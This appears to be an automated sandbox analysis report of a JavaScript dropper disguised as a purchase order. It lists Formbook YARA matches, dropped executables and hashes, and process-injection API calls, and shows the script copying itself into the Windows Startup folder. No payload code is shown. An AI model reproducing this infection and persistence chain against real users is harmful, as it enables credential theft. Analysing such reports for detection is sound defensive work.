Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.2.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 2.0.bin.exe.13a0000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300627425.00000249697C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.292250245.0000024969786000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.372823411.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.830373431.0000000000E20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.401722166.00000000014D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.830259140.0000000000B10000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.308018485.0000024969E00000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.281730307.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.297218621.00000249697DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.299860714.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.300915140.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.801300107.0000000000910000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000000.291613938.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.401531356.00000000013A1000.00000020.00000001.01000000.00000005.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000002.00000002.401874829.0000000001840000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300820496.00000249697DC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.281350445.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 0000000A.00000002.807957265.00000216DE0A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: webshell_asp_generic date = 2021-03-07, author = Arnim Rupp, description = Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = a8c63c418609c1c291b3e731ca85ded4b3e0fba83f3489c21a3199173b176a75, modified = 2021-10-29
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.300404894.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.296801406.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000000.344226970.0000000005604000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.302134868.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.303697866.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.292414870.0000024969A7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.295432260.00000249697F5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000003.300557956.0000024969403000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000012.00000002.805718233.00000000009A5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000003.280807014.0000024969781000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: Process Memory Space: wscript.exe PID: 6816, type: MEMORYSTR Matched rule: SUSP_Base64_Encoded_Hex_Encoded_Code date = 2019-04-29, author = Florian Roth, description = Detects hex encoded code that has been base64 encoded, score = https://www.nextron-systems.com/2019/04/29/spotlight-threat-hunting-yara-rule-example/
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: C:\Users\user\AppData\Local\Temp\bin.exe, type: DROPPED Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 032EB150 appears 32 times
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA320 NtCreateFile, 2_2_013BA320
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA3D0 NtReadFile, 2_2_013BA3D0
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA500 NtAllocateVirtualMemory, 2_2_013BA500
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA450 NtClose, 2_2_013BA450
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA31A NtCreateFile, 2_2_013BA31A
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA3CA NtReadFile, 2_2_013BA3CA
Source: C:\Users\user\AppData\Local\Temp\bin.exe Code function: 2_2_013BA4FA NtAllocateVirtualMemory, 2_2_013BA4FA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329710 NtQueryInformationToken,LdrInitializeThunk, 18_2_03329710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329B00 NtSetValueKey,LdrInitializeThunk, 18_2_03329B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329780 NtMapViewOfSection,LdrInitializeThunk, 18_2_03329780
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329FE0 NtCreateMutant,LdrInitializeThunk, 18_2_03329FE0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A50 NtCreateFile,LdrInitializeThunk, 18_2_03329A50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033296E0 NtFreeVirtualMemory,LdrInitializeThunk, 18_2_033296E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033296D0 NtCreateKey,LdrInitializeThunk, 18_2_033296D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329910 NtAdjustPrivilegesToken,LdrInitializeThunk, 18_2_03329910
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329540 NtReadFile,LdrInitializeThunk, 18_2_03329540
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033299A0 NtCreateSection,LdrInitializeThunk, 18_2_033299A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033295D0 NtClose,LdrInitializeThunk, 18_2_033295D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329860 NtQuerySystemInformation,LdrInitializeThunk, 18_2_03329860
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329840 NtDelayExecution,LdrInitializeThunk, 18_2_03329840
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329730 NtQueryVirtualMemory, 18_2_03329730
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332A710 NtOpenProcessToken, 18_2_0332A710
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329770 NtSetInformationFile, 18_2_03329770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332A770 NtOpenThread, 18_2_0332A770
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329760 NtOpenProcess, 18_2_03329760
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332A3B0 NtGetContextThread, 18_2_0332A3B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033297A0 NtUnmapViewOfSection, 18_2_033297A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A20 NtResumeThread, 18_2_03329A20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329610 NtEnumerateValueKey, 18_2_03329610
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A10 NtQuerySection, 18_2_03329A10
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A00 NtProtectVirtualMemory, 18_2_03329A00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329670 NtQueryInformationProcess, 18_2_03329670
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329660 NtAllocateVirtualMemory, 18_2_03329660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329650 NtQueryValueKey, 18_2_03329650
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329A80 NtOpenDirectoryObject, 18_2_03329A80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332AD30 NtSetContextThread, 18_2_0332AD30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329520 NtWaitForSingleObject, 18_2_03329520
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329560 NtWriteFile, 18_2_03329560
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329950 NtQueueApcThread, 18_2_03329950
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033295F0 NtQueryInformationFile, 18_2_033295F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033299D0 NtCreateProcessEx, 18_2_033299D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_03329820 NtEnumerateKey, 18_2_03329820
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0332B040 NtSuspendThread, 18_2_0332B040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033298A0 NtWriteVirtualMemory, 18_2_033298A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_033298F0 NtReadVirtualMemory, 18_2_033298F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A3D0 NtReadFile, 18_2_0092A3D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A320 NtCreateFile, 18_2_0092A320
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A450 NtClose, 18_2_0092A450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A3CA NtReadFile, 18_2_0092A3CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 18_2_0092A31A NtCreateFile, 18_2_0092A31A
Source: bin.exe.0.dr Static PE information: No import functions for PE file found
Source: msdxp.exe.4.dr Static PE information: No import functions for PE file found
Source: CIQ-PO116266.js Initial sample: Strings found which are bigger than 50
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\Lipg\msdxp.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Temp\bin.exe AD408337CE7D70D527D6A9044B1095B7F8149BB63139B0C5F2003E6D55305341
Source: bin.exe.0.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: msdxp.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: bin.exe.0.dr Static PE information: Section .text
Source: msdxp.exe.4.dr Static PE information: Section .text
Source: CIQ-PO116266.js ReversingLabs: Detection: 14%
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\CIQ-PO116266.js"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe" //B "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\bin.exe "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\ORYNeBzyRj.js"
Source: C:\Windows\explorer.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ORYNeBzyRj.js"
